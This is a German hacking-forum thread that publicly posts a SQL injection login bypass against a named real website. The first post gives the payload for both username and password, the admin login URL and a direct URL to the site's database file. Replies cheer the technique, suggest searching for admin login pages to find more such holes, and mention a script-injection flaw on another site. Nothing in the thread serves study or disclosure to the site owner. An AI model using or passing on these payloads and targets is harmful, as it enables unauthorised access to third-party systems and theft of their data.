Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLI] www.canada4u2.com

- - - - -

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
lNobodyl

lNobodyl

    Hacktivist

  • Premium Member
  • Likes
    55
  • 67 Beiträge
  • 22 Bedankt
  • iPhone
  • Windows, Mac OS
Login:
- Username: 'or '1'='1
- Passwort: 'or '1'='1

Loginseite: http://www.canada4u2.com/Canada4u2/adminlogin.asp
Datenbank: http://www.canada4u2.com/Canada4u2/mail1/cifs.mdb

Kind regards,

Nobody

nobody@xmpp.ninja


#2
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

'or '1'='1 ftw!!!

Dieser SQLi-Klassiker stirbt einfach nicht aus und das in Zeiten von vorgefertigten Escape-Functions...



#3
lNobodyl

lNobodyl

    Hacktivist

  • Premium Member
  • Likes
    55
  • 67 Beiträge
  • 22 Bedankt
  • iPhone
  • Windows, Mac OS

Ja, das ist fast schon traurig. Wenn man gezielt nach ,,admin login.asp" sucht, findet man fast auf jeder 2. Website solche Lücken. Hier habe ich noch sein ein fail gefunden;

Please Login HERE or Register HERE to see this link!

. Einfach irgendwas reinschreiben und schon wird die Nachricht mit ,,alert" aufgerufen.


Bearbeitet von lNobodyl, 11 June 2015 - 19:21 Uhr.

Kind regards,

Nobody

nobody@xmpp.ninja




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


Dieses Thema wurde von 30 Mitglied(ern) gelesen


    <cerrno>, 2242, B1nary, Breakk, Bypass, chick0n, Cranky, cyberwhore, Erikson, ferithan, Framerater, hacked, igorborisvas, Injection, izibitzi, kalixa, lNobodyl, mister-miyagi, most_uniQue, MrVinc, pekelhc, R3s1stanc3, smc2014, Smokyjoe, Throfix, Toolbase, ueEqlL, umarex, vôl, Xantar
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.